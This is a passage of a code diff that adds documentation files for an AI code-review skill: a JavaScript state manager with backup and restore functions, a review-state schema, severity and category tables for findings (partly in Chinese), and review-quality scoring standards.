for (const field of contextFields) {
|
||||
if (state.context[field] === undefined) {
|
||||
warnings.push(`context.${field} is missing`);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Error count validation
|
||||
if (typeof state.error_count !== 'number') {
|
||||
warnings.push('error_count should be a number');
|
||||
}
|
||||
|
||||
// Array fields validation
|
||||
const arrayFields = ['reviewed_dimensions', 'completed_actions', 'errors'];
|
||||
for (const field of arrayFields) {
|
||||
if (state[field] !== undefined && !Array.isArray(state[field])) {
|
||||
errors.push(`${field} must be an array`);
|
||||
}
|
||||
}
|
||||
|
||||
return {
|
||||
valid: errors.length === 0,
|
||||
errors,
|
||||
warnings
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if string is valid ISO timestamp
|
||||
*/
|
||||
function isValidISOTimestamp(str) {
|
||||
if (typeof str !== 'string') return false;
|
||||
const date = new Date(str);
|
||||
return !isNaN(date.getTime()) && str.includes('T');
|
||||
}
|
||||
```
|
||||
|
||||
### backupState(workDir)
|
||||
|
||||
Create a manual backup of current state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Create a manual backup of current state
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} [suffix] - Optional suffix for backup file name
|
||||
* @returns {string} - Backup file path
|
||||
*/
|
||||
function backupState(workDir, suffix = null) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
|
||||
const backupName = suffix
|
||||
? `state.backup.${suffix}.json`
|
||||
: `state.backup.${timestamp}.json`;
|
||||
const backupPath = `${workDir}/${backupName}`;
|
||||
|
||||
try {
|
||||
const content = Read(statePath);
|
||||
Write(backupPath, content);
|
||||
console.log(`[StateManager] Backup created: ${backupPath}`);
|
||||
return backupPath;
|
||||
} catch (error) {
|
||||
throw new Error(`Failed to create backup: ${error.message}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### restoreState(workDir, backupPath)
|
||||
|
||||
Restore state from a backup file.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Restore state from a backup file
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} [backupPath] - Path to backup file (default: latest backup)
|
||||
* @returns {object} - Restored state object
|
||||
*/
|
||||
function restoreState(workDir, backupPath = null) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const defaultBackup = `${workDir}/state.backup.json`;
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
|
||||
const sourcePath = backupPath || defaultBackup;
|
||||
|
||||
try {
|
||||
// Read backup
|
||||
const backupContent = Read(sourcePath);
|
||||
const backupState = JSON.parse(backupContent);
|
||||
|
||||
// Validate backup state
|
||||
const validation = validateState(backupState);
|
||||
if (!validation.valid) {
|
||||
throw new Error(`Backup state is invalid: ${validation.errors.join(', ')}`);
|
||||
}
|
||||
|
||||
// Create backup of current state before restore (for safety)
|
||||
try {
|
||||
const currentContent = Read(statePath);
|
||||
Write(`${workDir}/state.pre-restore.json`, currentContent);
|
||||
} catch (e) {
|
||||
// Current state may not exist, that's okay
|
||||
}
|
||||
|
||||
// Update timestamp
|
||||
const now = new Date().toISOString();
|
||||
backupState.updated_at = now;
|
||||
|
||||
// Write restored state
|
||||
Write(statePath, JSON.stringify(backupState, null, 2));
|
||||
|
||||
// Log to history
|
||||
try {
|
||||
let history = { entries: [] };
|
||||
try {
|
||||
history = JSON.parse(Read(historyPath));
|
||||
} catch (e) {}
|
||||
|
||||
history.entries.push({
|
||||
timestamp: now,
|
||||
action: 'restore',
|
||||
changes: { source: sourcePath }
|
||||
});
|
||||
|
||||
Write(historyPath, JSON.stringify(history, null, 2));
|
||||
} catch (e) {
|
||||
console.warn(`[StateManager] Failed to log restore to history`);
|
||||
}
|
||||
|
||||
console.log(`[StateManager] State restored from ${sourcePath}`);
|
||||
return backupState;
|
||||
} catch (error) {
|
||||
throw new Error(`Failed to restore state: ${error.message}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Convenience Functions
|
||||
|
||||
### getNextDimension(state)
|
||||
|
||||
Get the next dimension to review based on current state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Get next dimension to review
|
||||
* @param {object} state - Current state
|
||||
* @returns {string|null} - Next dimension or null if all reviewed
|
||||
*/
|
||||
function getNextDimension(state) {
|
||||
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
|
||||
const reviewed = state.reviewed_dimensions || [];
|
||||
|
||||
for (const dim of dimensions) {
|
||||
if (!reviewed.includes(dim)) {
|
||||
return dim;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
```
|
||||
|
||||
### addFinding(workDir, finding)
|
||||
|
||||
Add a new finding to the state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Add a finding to the appropriate dimension
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {object} finding - Finding object (must include dimension field)
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function addFinding(workDir, finding) {
|
||||
if (!finding.dimension) {
|
||||
throw new Error('Finding must have a dimension field');
|
||||
}
|
||||
|
||||
const state = getState(workDir);
|
||||
const dimension = finding.dimension;
|
||||
|
||||
// Generate ID if not provided
|
||||
if (!finding.id) {
|
||||
const prefixes = {
|
||||
correctness: 'CORR',
|
||||
readability: 'READ',
|
||||
performance: 'PERF',
|
||||
security: 'SEC',
|
||||
testing: 'TEST',
|
||||
architecture: 'ARCH'
|
||||
};
|
||||
const prefix = prefixes[dimension] || 'MISC';
|
||||
const count = (state.findings[dimension]?.length || 0) + 1;
|
||||
finding.id = `${prefix}-${String(count).padStart(3, '0')}`;
|
||||
}
|
||||
|
||||
const currentFindings = state.findings[dimension] || [];
|
||||
|
||||
return updateState(workDir, {
|
||||
findings: {
|
||||
...state.findings,
|
||||
[dimension]: [...currentFindings, finding]
|
||||
}
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
### markDimensionComplete(workDir, dimension)
|
||||
|
||||
Mark a dimension as reviewed.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Mark a dimension as reviewed
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} dimension - Dimension name
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function markDimensionComplete(workDir, dimension) {
|
||||
const state = getState(workDir);
|
||||
const reviewed = state.reviewed_dimensions || [];
|
||||
|
||||
if (reviewed.includes(dimension)) {
|
||||
console.warn(`[StateManager] Dimension ${dimension} already marked as reviewed`);
|
||||
return state;
|
||||
}
|
||||
|
||||
return updateState(workDir, {
|
||||
reviewed_dimensions: [...reviewed, dimension],
|
||||
current_dimension: null
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
### recordError(workDir, action, message)
|
||||
|
||||
Record an error in state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Record an execution error
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} action - Action that failed
|
||||
* @param {string} message - Error message
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function recordError(workDir, action, message) {
|
||||
const state = getState(workDir);
|
||||
const errors = state.errors || [];
|
||||
const errorCount = (state.error_count || 0) + 1;
|
||||
|
||||
const newError = {
|
||||
action,
|
||||
message,
|
||||
timestamp: new Date().toISOString()
|
||||
};
|
||||
|
||||
const newState = updateState(workDir, {
|
||||
errors: [...errors, newError],
|
||||
error_count: errorCount
|
||||
});
|
||||
|
||||
// Auto-fail if error count exceeds threshold
|
||||
if (errorCount >= 3) {
|
||||
return updateState(workDir, {
|
||||
status: 'failed'
|
||||
});
|
||||
}
|
||||
|
||||
return newState;
|
||||
}
|
||||
```
|
||||
|
||||
## Usage Examples
|
||||
|
||||
### Initialize and Run Review
|
||||
|
||||
```javascript
|
||||
// Initialize new review session
|
||||
const workDir = '/path/to/review-session';
|
||||
const state = initState(workDir);
|
||||
|
||||
// Update status to running
|
||||
updateState(workDir, { status: 'running' });
|
||||
|
||||
// After collecting context
|
||||
updateState(workDir, {
|
||||
context: {
|
||||
target_path: '/src/auth',
|
||||
files: ['auth.ts', 'login.ts'],
|
||||
language: 'typescript',
|
||||
total_lines: 500,
|
||||
file_count: 2
|
||||
}
|
||||
});
|
||||
|
||||
// After completing quick scan
|
||||
updateState(workDir, {
|
||||
scan_completed: true,
|
||||
scan_summary: {
|
||||
risk_areas: [{ file: 'auth.ts', reason: 'Complex logic', priority: 'high' }],
|
||||
complexity_score: 7.5,
|
||||
quick_issues: []
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### Add Findings During Review
|
||||
|
||||
```javascript
|
||||
// Add a security finding
|
||||
addFinding(workDir, {
|
||||
dimension: 'security',
|
||||
severity: 'high',
|
||||
category: 'injection',
|
||||
file: 'auth.ts',
|
||||
line: 45,
|
||||
description: 'SQL injection vulnerability',
|
||||
recommendation: 'Use parameterized queries'
|
||||
});
|
||||
|
||||
// Mark dimension complete
|
||||
markDimensionComplete(workDir, 'security');
|
||||
```
|
||||
|
||||
### Error Handling with Rollback
|
||||
|
||||
```javascript
|
||||
try {
|
||||
updateState(workDir, {
|
||||
status: 'running',
|
||||
current_action: 'deep-review'
|
||||
});
|
||||
|
||||
// ... do review work ...
|
||||
|
||||
} catch (error) {
|
||||
// Record error
|
||||
recordError(workDir, 'deep-review', error.message);
|
||||
|
||||
// If needed, restore from backup
|
||||
restoreState(workDir);
|
||||
}
|
||||
```
|
||||
|
||||
### Check Review Progress
|
||||
|
||||
```javascript
|
||||
const state = getState(workDir);
|
||||
const nextDim = getNextDimension(state);
|
||||
|
||||
if (nextDim) {
|
||||
console.log(`Next dimension to review: ${nextDim}`);
|
||||
updateState(workDir, { current_dimension: nextDim });
|
||||
} else {
|
||||
console.log('All dimensions reviewed');
|
||||
}
|
||||
```
|
||||
|
||||
## Integration with Orchestrator
|
||||
|
||||
Update the orchestrator to use StateManager:
|
||||
|
||||
```javascript
|
||||
// In orchestrator.md - Replace direct state operations with StateManager calls
|
||||
|
||||
// OLD:
|
||||
const state = JSON.parse(Read(`${workDir}/state.json`));
|
||||
|
||||
// NEW:
|
||||
const state = getState(workDir);
|
||||
|
||||
// OLD:
|
||||
function updateState(updates) {
|
||||
const state = JSON.parse(Read(`${workDir}/state.json`));
|
||||
const newState = { ...state, ...updates, updated_at: new Date().toISOString() };
|
||||
Write(`${workDir}/state.json`, JSON.stringify(newState, null, 2));
|
||||
return newState;
|
||||
}
|
||||
|
||||
// NEW:
|
||||
// Import from state-manager.md
|
||||
// updateState(workDir, updates) - handles atomic write, backup, validation
|
||||
|
||||
// Error handling - OLD:
|
||||
updateState({
|
||||
errors: [...(state.errors || []), { action: actionId, message: error.message, timestamp: new Date().toISOString() }],
|
||||
error_count: (state.error_count || 0) + 1
|
||||
});
|
||||
|
||||
// Error handling - NEW:
|
||||
recordError(workDir, actionId, error.message);
|
||||
```
|
||||
|
||||
## State History Format
|
||||
|
||||
The `state-history.json` file tracks all state changes:
|
||||
|
||||
```json
|
||||
{
|
||||
"entries": [
|
||||
{
|
||||
"timestamp": "2024-01-01T10:00:00.000Z",
|
||||
"action": "init",
|
||||
"changes": { "type": "initialize", "status": "pending" }
|
||||
},
|
||||
{
|
||||
"timestamp": "2024-01-01T10:01:00.000Z",
|
||||
"action": "update",
|
||||
"changes": {
|
||||
"status": { "from": "pending", "to": "running" },
|
||||
"current_action": { "from": null, "to": "action-collect-context" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"timestamp": "2024-01-01T10:05:00.000Z",
|
||||
"action": "restore",
|
||||
"changes": { "source": "/path/state.backup.json" }
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
## Error Recovery Strategies
|
||||
|
||||
| Scenario | Strategy | Function |
|
||||
|----------|----------|----------|
|
||||
| State file corrupted | Restore from backup | `restoreState(workDir)` |
|
||||
| Invalid state after update | Auto-rollback (built-in) | N/A (automatic) |
|
||||
| Multiple errors | Auto-fail after 3 | `recordError()` |
|
||||
| Need to retry from checkpoint | Restore specific backup | `restoreState(workDir, backupPath)` |
|
||||
| Review interrupted | Resume from saved state | `getState(workDir)` |
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Always use `updateState()`** - Never write directly to state.json
|
||||
2. **Check validation warnings** - Warnings may indicate data issues
|
||||
3. **Use convenience functions** - `addFinding()`, `markDimensionComplete()`, etc.
|
||||
4. **Monitor history** - Check state-history.json for debugging
|
||||
5. **Create named backups** - Before major operations: `backupState(workDir, 'pre-deep-review')`
|
||||
174
.claude/skills/review-code/phases/state-schema.md
Normal file
174
.claude/skills/review-code/phases/state-schema.md
Normal file
@@ -0,0 +1,174 @@
|
||||
# State Schema
|
||||
|
||||
Code Review 状态结构定义。
|
||||
|
||||
## Schema Definition
|
||||
|
||||
```typescript
|
||||
interface ReviewState {
|
||||
// === 元数据 ===
|
||||
status: 'pending' | 'running' | 'completed' | 'failed' | 'user_exit';
|
||||
started_at: string; // ISO timestamp
|
||||
updated_at: string; // ISO timestamp
|
||||
completed_at?: string; // ISO timestamp
|
||||
|
||||
// === 审查目标 ===
|
||||
context: {
|
||||
target_path: string; // 目标路径(文件或目录)
|
||||
files: string[]; // 待审查文件列表
|
||||
language: string; // 主要编程语言
|
||||
framework?: string; // 框架(如有)
|
||||
total_lines: number; // 总代码行数
|
||||
file_count: number; // 文件数量
|
||||
};
|
||||
|
||||
// === 扫描结果 ===
|
||||
scan_completed: boolean;
|
||||
scan_summary: {
|
||||
risk_areas: RiskArea[]; // 高风险区域
|
||||
complexity_score: number; // 复杂度评分
|
||||
quick_issues: QuickIssue[]; // 快速发现的问题
|
||||
};
|
||||
|
||||
// === 审查进度 ===
|
||||
reviewed_dimensions: string[]; // 已完成的审查维度
|
||||
current_dimension?: string; // 当前审查维度
|
||||
|
||||
// === 发现的问题 ===
|
||||
findings: {
|
||||
correctness: Finding[];
|
||||
readability: Finding[];
|
||||
performance: Finding[];
|
||||
security: Finding[];
|
||||
testing: Finding[];
|
||||
architecture: Finding[];
|
||||
};
|
||||
|
||||
// === 报告状态 ===
|
||||
report_generated: boolean;
|
||||
report_path?: string;
|
||||
|
||||
// === 执行跟踪 ===
|
||||
current_action?: string;
|
||||
completed_actions: string[];
|
||||
errors: ExecutionError[];
|
||||
error_count: number;
|
||||
|
||||
// === 统计信息 ===
|
||||
summary?: {
|
||||
total_issues: number;
|
||||
critical: number;
|
||||
high: number;
|
||||
medium: number;
|
||||
low: number;
|
||||
info: number;
|
||||
review_duration_ms: number;
|
||||
};
|
||||
}
|
||||
|
||||
interface RiskArea {
|
||||
file: string;
|
||||
reason: string;
|
||||
priority: 'high' | 'medium' | 'low';
|
||||
}
|
||||
|
||||
interface QuickIssue {
|
||||
type: string;
|
||||
file: string;
|
||||
line?: number;
|
||||
message: string;
|
||||
}
|
||||
|
||||
interface Finding {
|
||||
id: string; // 唯一标识 e.g., "CORR-001"
|
||||
severity: 'critical' | 'high' | 'medium' | 'low' | 'info';
|
||||
dimension: string; // 所属维度
|
||||
category: string; // 问题类别
|
||||
file: string; // 文件路径
|
||||
line?: number; // 行号
|
||||
column?: number; // 列号
|
||||
code_snippet?: string; // 问题代码片段
|
||||
description: string; // 问题描述
|
||||
recommendation: string; // 修复建议
|
||||
fix_example?: string; // 修复示例代码
|
||||
references?: string[]; // 参考资料链接
|
||||
}
|
||||
|
||||
interface ExecutionError {
|
||||
action: string;
|
||||
message: string;
|
||||
timestamp: string;
|
||||
}
|
||||
```
|
||||
|
||||
## Initial State
|
||||
|
||||
```json
|
||||
{
|
||||
"status": "pending",
|
||||
"started_at": "2024-01-01T00:00:00.000Z",
|
||||
"updated_at": "2024-01-01T00:00:00.000Z",
|
||||
"context": null,
|
||||
"scan_completed": false,
|
||||
"scan_summary": null,
|
||||
"reviewed_dimensions": [],
|
||||
"current_dimension": null,
|
||||
"findings": {
|
||||
"correctness": [],
|
||||
"readability": [],
|
||||
"performance": [],
|
||||
"security": [],
|
||||
"testing": [],
|
||||
"architecture": []
|
||||
},
|
||||
"report_generated": false,
|
||||
"report_path": null,
|
||||
"current_action": null,
|
||||
"completed_actions": [],
|
||||
"errors": [],
|
||||
"error_count": 0,
|
||||
"summary": null
|
||||
}
|
||||
```
|
||||
|
||||
## State Transitions
|
||||
|
||||
```mermaid
|
||||
stateDiagram-v2
|
||||
[*] --> pending: Initialize
|
||||
pending --> running: collect-context
|
||||
running --> running: quick-scan
|
||||
running --> running: deep-review (6x)
|
||||
running --> running: generate-report
|
||||
running --> completed: complete
|
||||
running --> failed: error_count >= 3
|
||||
running --> user_exit: User abort
|
||||
completed --> [*]
|
||||
failed --> [*]
|
||||
user_exit --> [*]
|
||||
```
|
||||
|
||||
## Dimension Review Order
|
||||
|
||||
1. **correctness** - 正确性(最高优先级)
|
||||
2. **security** - 安全性(关键)
|
||||
3. **performance** - 性能
|
||||
4. **readability** - 可读性
|
||||
5. **testing** - 测试覆盖
|
||||
6. **architecture** - 架构一致性
|
||||
|
||||
## Finding ID Format
|
||||
|
||||
```
|
||||
{DIMENSION_PREFIX}-{SEQUENCE}
|
||||
|
||||
Prefixes:
|
||||
- CORR: Correctness
|
||||
- READ: Readability
|
||||
- PERF: Performance
|
||||
- SEC: Security
|
||||
- TEST: Testing
|
||||
- ARCH: Architecture
|
||||
|
||||
Example: SEC-003 = Security issue #3
|
||||
```
|
||||
228
.claude/skills/review-code/specs/issue-classification.md
Normal file
228
.claude/skills/review-code/specs/issue-classification.md
Normal file
@@ -0,0 +1,228 @@
|
||||
# Issue Classification
|
||||
|
||||
问题分类和严重程度标准。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-deep-review | 确定问题严重程度 | Severity Levels |
|
||||
| action-generate-report | 问题分类展示 | Category Mapping |
|
||||
|
||||
---
|
||||
|
||||
## Severity Levels
|
||||
|
||||
### Critical (严重) 🔴
|
||||
|
||||
**定义**: 必须在合并前修复的阻塞性问题
|
||||
|
||||
**标准**:
|
||||
- 安全漏洞 (可被利用)
|
||||
- 数据损坏或丢失风险
|
||||
- 系统崩溃风险
|
||||
- 生产环境重大故障
|
||||
|
||||
**示例**:
|
||||
- SQL/XSS/命令注入
|
||||
- 硬编码密钥泄露
|
||||
- 未捕获的异常导致崩溃
|
||||
- 数据库事务未正确处理
|
||||
|
||||
**响应**: 必须立即修复,阻塞合并
|
||||
|
||||
---
|
||||
|
||||
### High (高) 🟠
|
||||
|
||||
**定义**: 应在合并前修复的重要问题
|
||||
|
||||
**标准**:
|
||||
- 功能缺陷
|
||||
- 重要边界条件未处理
|
||||
- 性能严重退化
|
||||
- 资源泄漏
|
||||
|
||||
**示例**:
|
||||
- 核心业务逻辑错误
|
||||
- 内存泄漏
|
||||
- N+1 查询问题
|
||||
- 缺少必要的错误处理
|
||||
|
||||
**响应**: 强烈建议修复
|
||||
|
||||
---
|
||||
|
||||
### Medium (中) 🟡
|
||||
|
||||
**定义**: 建议修复的代码质量问题
|
||||
|
||||
**标准**:
|
||||
- 代码可维护性问题
|
||||
- 轻微性能问题
|
||||
- 测试覆盖不足
|
||||
- 不符合团队规范
|
||||
|
||||
**示例**:
|
||||
- 函数过长
|
||||
- 命名不清晰
|
||||
- 缺少注释
|
||||
- 代码重复
|
||||
|
||||
**响应**: 建议在后续迭代修复
|
||||
|
||||
---
|
||||
|
||||
### Low (低) 🔵
|
||||
|
||||
**定义**: 可选优化的问题
|
||||
|
||||
**标准**:
|
||||
- 风格问题
|
||||
- 微小优化
|
||||
- 可读性改进
|
||||
|
||||
**示例**:
|
||||
- 变量声明顺序
|
||||
- 额外的空行
|
||||
- 可以更简洁的写法
|
||||
|
||||
**响应**: 可根据团队偏好处理
|
||||
|
||||
---
|
||||
|
||||
### Info (信息) ⚪
|
||||
|
||||
**定义**: 信息性建议,非问题
|
||||
|
||||
**标准**:
|
||||
- 学习机会
|
||||
- 替代方案建议
|
||||
- 文档完善建议
|
||||
|
||||
**示例**:
|
||||
- "这里可以考虑使用新的 API"
|
||||
- "建议添加 JSDoc 注释"
|
||||
- "可以参考 xxx 模式"
|
||||
|
||||
**响应**: 仅供参考
|
||||
|
||||
---
|
||||
|
||||
## Category Mapping
|
||||
|
||||
### By Dimension
|
||||
|
||||
| Dimension | Common Categories |
|
||||
|-----------|-------------------|
|
||||
| Correctness | `null-check`, `boundary`, `error-handling`, `type-safety`, `logic-error` |
|
||||
| Security | `injection`, `xss`, `hardcoded-secret`, `auth`, `sensitive-data` |
|
||||
| Performance | `complexity`, `n+1-query`, `memory-leak`, `blocking-io`, `inefficient-algorithm` |
|
||||
| Readability | `naming`, `function-length`, `complexity`, `comments`, `duplication` |
|
||||
| Testing | `coverage`, `boundary-test`, `mock-abuse`, `test-isolation` |
|
||||
| Architecture | `layer-violation`, `circular-dependency`, `coupling`, `srp-violation` |
|
||||
|
||||
### Category Details
|
||||
|
||||
#### Correctness Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `null-check` | 缺少空值检查 | High |
|
||||
| `boundary` | 边界条件未处理 | High |
|
||||
| `error-handling` | 错误处理不当 | High |
|
||||
| `type-safety` | 类型安全问题 | Medium |
|
||||
| `logic-error` | 逻辑错误 | Critical/High |
|
||||
| `resource-leak` | 资源泄漏 | High |
|
||||
|
||||
#### Security Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `injection` | 注入风险 (SQL/Command) | Critical |
|
||||
| `xss` | 跨站脚本风险 | Critical |
|
||||
| `hardcoded-secret` | 硬编码密钥 | Critical |
|
||||
| `auth` | 认证授权问题 | High |
|
||||
| `sensitive-data` | 敏感数据暴露 | High |
|
||||
| `insecure-dependency` | 不安全依赖 | Medium |
|
||||
|
||||
#### Performance Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `complexity` | 高算法复杂度 | Medium |
|
||||
| `n+1-query` | N+1 查询问题 | High |
|
||||
| `memory-leak` | 内存泄漏 | High |
|
||||
| `blocking-io` | 阻塞 I/O | Medium |
|
||||
| `inefficient-algorithm` | 低效算法 | Medium |
|
||||
| `missing-cache` | 缺少缓存 | Low |
|
||||
|
||||
#### Readability Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `naming` | 命名问题 | Medium |
|
||||
| `function-length` | 函数过长 | Medium |
|
||||
| `nesting-depth` | 嵌套过深 | Medium |
|
||||
| `comments` | 注释问题 | Low |
|
||||
| `duplication` | 代码重复 | Medium |
|
||||
| `magic-number` | 魔法数字 | Low |
|
||||
|
||||
#### Testing Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `coverage` | 测试覆盖不足 | Medium |
|
||||
| `boundary-test` | 缺少边界测试 | Medium |
|
||||
| `mock-abuse` | Mock 过度使用 | Low |
|
||||
| `test-isolation` | 测试不独立 | Medium |
|
||||
| `flaky-test` | 不稳定测试 | High |
|
||||
|
||||
#### Architecture Categories
|
||||
|
||||
| Category | Description | Default Severity |
|
||||
|----------|-------------|------------------|
|
||||
| `layer-violation` | 层次违规 | Medium |
|
||||
| `circular-dependency` | 循环依赖 | High |
|
||||
| `coupling` | 耦合过紧 | Medium |
|
||||
| `srp-violation` | 单一职责违规 | Medium |
|
||||
| `god-class` | 上帝类 | High |
|
||||
|
||||
---
|
||||
|
||||
## Finding ID Format
|
||||
|
||||
```
|
||||
{PREFIX}-{NNN}
|
||||
|
||||
Prefixes by Dimension:
|
||||
- CORR: Correctness
|
||||
- SEC: Security
|
||||
- PERF: Performance
|
||||
- READ: Readability
|
||||
- TEST: Testing
|
||||
- ARCH: Architecture
|
||||
|
||||
Examples:
|
||||
- SEC-001: First security finding
|
||||
- CORR-015: 15th correctness finding
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Quality Gates
|
||||
|
||||
| Gate | Condition | Action |
|
||||
|------|-----------|--------|
|
||||
| **Block** | Critical > 0 | 禁止合并 |
|
||||
| **Warn** | High > 0 | 需要审批 |
|
||||
| **Pass** | Critical = 0, High = 0 | 允许合并 |
|
||||
|
||||
### Recommended Thresholds
|
||||
|
||||
| Metric | Ideal | Acceptable | Needs Work |
|
||||
|--------|-------|------------|------------|
|
||||
| Critical | 0 | 0 | Any > 0 |
|
||||
| High | 0 | ≤ 2 | > 2 |
|
||||
| Medium | ≤ 5 | ≤ 10 | > 10 |
|
||||
| Total | ≤ 10 | ≤ 20 | > 20 |
|
||||
214
.claude/skills/review-code/specs/quality-standards.md
Normal file
214
.claude/skills/review-code/specs/quality-standards.md
Normal file
@@ -0,0 +1,214 @@
|
||||
# Quality Standards
|
||||
|
||||
代码审查质量标准。
|
||||
|
||||
## When to Use
|
||||
|
||||
| Phase | Usage | Section |
|
||||
|-------|-------|---------|
|
||||
| action-generate-report | 质量评估 | Quality Dimensions |
|
||||
| action-complete | 最终评分 | Quality Gates |
|
||||
|
||||
---
|
||||
|
||||
## Quality Dimensions
|
||||
|
||||
### 1. Completeness (完整性) - 25%
|
||||
|
||||
**评估审查覆盖的完整程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 所有维度审查完成,所有高风险文件检查 |
|
||||
| 80% | 核心维度完成,主要文件检查 |
|
||||
| 60% | 部分维度完成 |
|
||||
| < 60% | 审查不完整 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 6 个维度全部审查
|
||||
- [ ] 高风险区域重点检查
|
||||
- [ ] 关键文件覆盖
|
||||
|
||||
---
|
||||
|
||||
### 2. Accuracy (准确性) - 25%
|
||||
|
||||
**评估发现问题的准确程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 问题定位准确,分类正确,无误报 |
|
||||
| 80% | 偶有分类偏差,定位准确 |
|
||||
| 60% | 存在误报或漏报 |
|
||||
| < 60% | 准确性差 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 问题行号准确
|
||||
- [ ] 严重程度合理
|
||||
- [ ] 分类正确
|
||||
|
||||
---
|
||||
|
||||
### 3. Actionability (可操作性) - 25%
|
||||
|
||||
**评估建议的实用程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 每个问题都有具体可执行的修复建议 |
|
||||
| 80% | 大部分问题有清晰建议 |
|
||||
| 60% | 建议较笼统 |
|
||||
| < 60% | 缺乏可操作建议 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] 提供具体修复建议
|
||||
- [ ] 包含代码示例
|
||||
- [ ] 说明修复优先级
|
||||
|
||||
---
|
||||
|
||||
### 4. Consistency (一致性) - 25%
|
||||
|
||||
**评估审查标准的一致程度**
|
||||
|
||||
| Score | Criteria |
|
||||
|-------|----------|
|
||||
| 100% | 相同问题相同处理,标准统一 |
|
||||
| 80% | 基本一致,偶有差异 |
|
||||
| 60% | 标准不太统一 |
|
||||
| < 60% | 标准混乱 |
|
||||
|
||||
**检查点**:
|
||||
- [ ] ID 格式统一
|
||||
- [ ] 严重程度标准一致
|
||||
- [ ] 描述风格统一
|
||||
|
||||
---
|
||||
|
||||
## Quality Gates
|
||||
|
||||
### Review Quality Gate
|
||||
|
||||
| Gate | Overall Score | Action |
|
||||
|------|---------------|--------|
|
||||
| **Excellent** | ≥ 90% | 高质量审查 |
|
||||
| **Good** | ≥ 80% | 合格审查 |
|
||||
| **Acceptable** | ≥ 70% | 基本可接受 |
|
||||
| **Needs Improvement** | < 70% | 需要改进 |
|
||||
|
||||
### Code Quality Gate (Based on Findings)
|
||||
|
||||
| Gate | Condition | Recommendation |
|
||||
|------|-----------|----------------|
|
||||
| **Block** | Critical > 0 | 禁止合并,必须修复 |
|
||||
| **Warn** | High > 3 | 需要团队讨论 |
|
||||
| **Caution** | Medium > 10 | 建议改进 |
|
||||
| **Pass** | 其他 | 可以合并 |
|
||||
|
||||
---
|
||||
|
||||
## Report Quality Checklist
|
||||
|
||||
### Structure
|
||||
|
||||
- [ ] 包含审查概览
|
||||
- [ ] 包含问题统计
|
||||
- [ ] 包含高风险区域
|
||||
- [ ] 包含问题详情
|
||||
- [ ] 包含修复建议
|
||||
|
||||
### Content
|
||||
|
||||
- [ ] 问题描述清晰
|
||||
- [ ] 文件位置准确
|
||||
- [ ] 代码片段有效
|
||||
- [ ] 修复建议具体
|
||||
- [ ] 优先级明确
|
||||
|
||||
### Format
|
||||
|
||||
- [ ] Markdown 格式正确
|
||||
- [ ] 表格对齐
|
||||
- [ ] 代码块语法正确
|
||||
- [ ] 链接有效
|
||||
- [ ] 无拼写错误
|
||||
|
||||
---
|
||||
|
||||
## Validation Function
|
||||
|
||||
```javascript
|
||||
function validateReviewQuality(state) {
|
||||
const scores = {
|
||||
completeness: 0,
|
||||
accuracy: 0,
|
||||
actionability: 0,
|
||||
consistency: 0
|
||||
};
|
||||
|
||||
// 1. Completeness
|
||||
const dimensionsReviewed = state.reviewed_dimensions?.length || 0;
|
||||
scores.completeness = (dimensionsReviewed / 6) * 100;
|
||||
|
||||
// 2. Accuracy (需要人工验证或后续反馈)
|
||||
// 暂时基于有无错误来估算
|
||||
scores.accuracy = state.error_count === 0 ? 100 : Math.max(0, 100 - state.error_count * 20);
|
||||
|
||||
// 3. Actionability
|
||||
const findings = Object.values(state.findings).flat();
|
||||
const withRecommendations = findings.filter(f => f.recommendation).length;
|
||||
scores.actionability = findings.length > 0
|
||||
? (withRecommendations / findings.length) * 100
|
||||
: 100;
|
||||
|
||||
// 4. Consistency (检查 ID 格式等)
|
||||
const validIds = findings.filter(f => /^(CORR|SEC|PERF|READ|TEST|ARCH)-\d{3}$/.test(f.id)).length;
|
||||
